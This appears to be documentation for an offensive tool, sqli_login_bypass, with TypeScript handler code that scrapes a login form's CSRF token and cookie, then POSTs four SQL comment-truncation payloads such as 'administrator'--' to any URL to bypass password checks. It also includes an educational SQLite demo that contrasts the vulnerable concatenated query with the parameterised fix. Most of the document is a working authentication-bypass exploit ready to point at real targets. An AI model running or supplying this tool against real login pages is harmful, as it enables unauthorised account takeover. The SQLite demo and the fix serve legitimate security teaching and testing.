sqli_login_bypass
Bypasses login authentication by SQL comment truncation: extracts the form's CSRF token, then submits comment-terminated usernames to test a login form for SQL injection.
Instructions
Bypass login via SQL comment truncation (`administrator'--`). The tool fetches the login page and extracts the CSRF token from the form, then POSTs with the SQL injection payload in the username field and a throwaway password. When the login query concatenates the username into the SQL string, the quote closes the username literal and the comment sequence discards the rest of the statement, including the password check, so the query matches the named user regardless of password. Four comment variants are tried (`'--`, `'-- -`, `' #`, `'/*`) because dialects differ: MySQL only treats `--` as a comment when whitespace follows it (hence `-- -`) and accepts `#`, while `#` is not a comment in SQLite or PostgreSQL and produces a syntax error there. Returns csrf_extracted and, per payload, status_code, response_length, headers, redirect_url and likely_bypass. likely_bypass is a heuristic: it is set on any 301/302/303 response or on a redirect whose target mentions "dashboard" or "admin", so a form that also redirects on a failed login will trigger it; compare each result against a baseline request with a plain, valid-looking username before treating it as a finding.
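What the payloads do to the login query, as an added example that is not part of this project: a constructed SQLite users table and a login check that concatenates the username into the SQL string, which is the pattern the tool targets. SQLite stands in for the target's database here, so the dialect differences behind the tool's four variants are visible: `--` and an unterminated `/*` discard the password check, while `#` is not a comment in SQLite and fails with a syntax error (it works on MySQL). The parameterised check at the end is the fix. The user names, passwords and `vulnerable_login`/`safe_login` helpers are assumptions for the demo.

```python
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Constructed demo data: an in-memory table standing in for the target's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("administrator", "hunter2"), ("wiener", "peter")],
    )
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> dict:
    """Login check built by string concatenation: the query shape the tool's payloads target."""
    query = (
        "SELECT id, username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.OperationalError as exc:
        # A comment syntax the dialect does not accept is a syntax error; on a live site
        # that usually surfaces as a 500 or an error page rather than a bypass.
        return {"query": query, "user": None, "error": str(exc)}
    return {"query": query, "user": row[1] if row else None, "error": None}


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Same check with bound parameters: quote and comment stay inside the string value."""
    row = conn.execute(
        "SELECT id, username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[1] if row else None


# The four variants the tool sends, each paired with a throwaway password.
PAYLOADS = ["administrator'--", "administrator'-- -", "administrator' #", "administrator'/*"]


def run_payloads(conn: sqlite3.Connection) -> dict:
    """Run every variant through the vulnerable check and collect the outcome per payload."""
    return {p: vulnerable_login(conn, p, "anything") for p in PAYLOADS}


if __name__ == "__main__":
    db = make_db()
    for payload, outcome in run_payloads(db).items():
        print(f"{payload!r:24} -> user={outcome['user']!r} error={outcome['error']!r}")
        print("    " + outcome["query"])
    print("parameterised:", safe_login(db, "administrator'--", "anything"))
```

Against this SQLite table the `'--`, `'-- -` and `'/*` variants all return `administrator` without a valid password, the `' #` variant raises an unrecognized-token error, and the parameterised query returns no row for any of them. Swapping the connection for a MySQL one changes which variants succeed, which is why the tool reports each payload separately instead of stopping at the first.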
Input Schema
| Name | Required | Description | Default |
|---|---|---|---|
| url | Yes | Login form URL, e.g. https://target/login | |
| username | No | Target username to bypass auth for, e.g. 'administrator' | administrator |
| csrf_field | No | Name of the CSRF token field in the form | csrf |
| username_field | No | Name of the username form field | username |
| password_field | No | Name of the password form field | password |
Implementation Reference
- src/tools/sqli.ts:70-129 (handler): the implementation of the sqli_login_bypass tool. It fetches the login page and extracts the CSRF token, then POSTs each comment-truncation payload in the username field with the token and a throwaway password, and flags a likely bypass from the response status and redirect target.
```ts
// server, z, requireTool and runCmd are defined or imported earlier in src/tools/sqli.ts,
// before this excerpt.

// Escape a user-supplied field name before embedding it in a RegExp.
function escapeRegExp(s: string): string {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

server.tool(
  "sqli_login_bypass",
  "Bypass login via SQL comment truncation (administrator'--). Extracts CSRF token from form, then POSTs with SQLi in the username field. The -- comment truncates the password check. Returns csrf_extracted, status_code, response_length, headers, likely_bypass.",
  {
    url: z.string().describe("Login form URL, e.g. https://target/login"),
    username: z.string().optional().describe("Target username to bypass auth for, e.g. 'administrator'"),
    csrf_field: z.string().optional().describe("Name of the CSRF token field in the form"),
    username_field: z.string().optional().describe("Name of the username form field"),
    password_field: z.string().optional().describe("Name of the password form field"),
  },
  async ({ url, username = "administrator", csrf_field = "csrf", username_field = "username", password_field = "password" }) => {
    requireTool("curl");

    // Step 1: fetch the login form once, keeping the response headers so the session cookie
    // the CSRF token is bound to can be replayed on the POST. Arguments go to curl directly,
    // not through a shell, so a quote in url or csrf_field cannot break out into a command.
    const page = await runCmd("curl", ["-sk", "-D", "-", url]);
    const cookies: string[] = [];
    const cookieRe = /^set-cookie:\s*([^;\r\n]+)/gim;
    let m: RegExpExecArray | null;
    while ((m = cookieRe.exec(page.stdout)) !== null) cookies.push(m[1]);
    const cookieHeader = cookies.join("; ");

    // Token lookup: a hidden input first, then a bare name=value pair as a fallback.
    const field = escapeRegExp(csrf_field);
    const tokenMatch =
      page.stdout.match(new RegExp(`${field}["\\s=]+value=["']([^"']+)`)) ||
      page.stdout.match(new RegExp(`${field}=([^"&]+)`));
    const csrfToken = tokenMatch ? tokenMatch[1].trim() : "";

    // Step 2: comment sequences for the common dialects. MySQL needs whitespace after "--",
    // hence "-- -"; "#" is MySQL-only; "/*" relies on an unterminated block comment.
    const payloads = [
      `${username}'--`,
      `${username}'-- -`,
      `${username}' #`,
      `${username}'/*`,
    ];

    const results = [];
    for (const payload of payloads) {
      // --data-urlencode form-encodes each value, so "#" and spaces in the payload survive.
      const args = [
        "-sk", "-D", "-", "-o", "/dev/null",
        "-w", "\n%{http_code}:%{size_download}:%{redirect_url}",
        "-X", "POST",
        "--data-urlencode", `${csrf_field}=${csrfToken}`,
        "--data-urlencode", `${username_field}=${payload}`,
        "--data-urlencode", `${password_field}=anything`,
      ];
      if (cookieHeader) args.push("-b", cookieHeader);
      args.push(url);
      const res = await runCmd("curl", args);

      // The last line is the -w summary; everything before it is the header dump.
      const lines = res.stdout.split("\n");
      const statusLine = lines.pop() || "0:0:";
      const headers = lines.map((l) => l.trim()).filter((l) => l.length > 0);
      const [code, size, ...rest] = statusLine.split(":");
      const status = parseInt(code, 10) || 0;
      const responseLength = parseInt(size, 10) || 0;
      // Re-join the remainder: the redirect URL itself contains ":" after the scheme.
      const redirect = rest.join(":");
      results.push({
        payload,
        status_code: status,
        response_length: responseLength,
        redirect_url: redirect,
        headers,
        likely_bypass:
          [301, 302, 303].includes(status) ||
          redirect.toLowerCase().includes("dashboard") ||
          redirect.toLowerCase().includes("admin"),
      });
    }

    const result = {
      csrf_extracted: Boolean(csrfToken),
      csrf_token: csrfToken.length > 20 ? csrfToken.slice(0, 20) + "..." : csrfToken,
      results,
    };
    return { content: [{ type: "text" as const, text: JSON.stringify(result, null, 2) }] };
  }
);
```